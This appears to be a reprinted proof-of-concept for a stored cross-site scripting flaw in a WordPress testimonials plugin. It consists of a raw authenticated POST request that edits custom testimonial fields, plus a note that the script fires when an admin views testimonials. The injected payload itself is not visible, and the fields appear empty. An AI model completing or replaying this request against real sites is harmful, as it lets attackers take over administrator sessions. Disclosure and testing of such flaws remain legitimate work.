/ *
Original reprint please indicate
https://www.wpon.cn.11294.html
By xiarou page
* /
POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=176&action=edit
X-WP-Nonce: c12330b50c
Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286
Origin: http://example.com
Content-Length: 2729
DNT: 1
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wpnonce"
c627da8fa4
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/post.php?post=176&action=edit
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="user_ID"
3
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="action"
editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="originalaction"
editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_type"
testimonial
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="original_post_status"
publish
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="referredby"
http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_original_http_referer"
http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_ID"
176
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="meta-box-order-nonce"
e78bbacfea
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="closedpostboxesnonce"
cb99c6138d
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="samplepermalinknonce"
97e0ac6960
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="my-custom-fields_wpnonce"
f842632466
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_client"
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_email"
test@gmail.com
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_position"
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_other"
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_rating"
-----------------------------1097171016543246544154165286--
#XSS TRIGGER POINT:
When an admin or authenticate user load contents of all testimonials.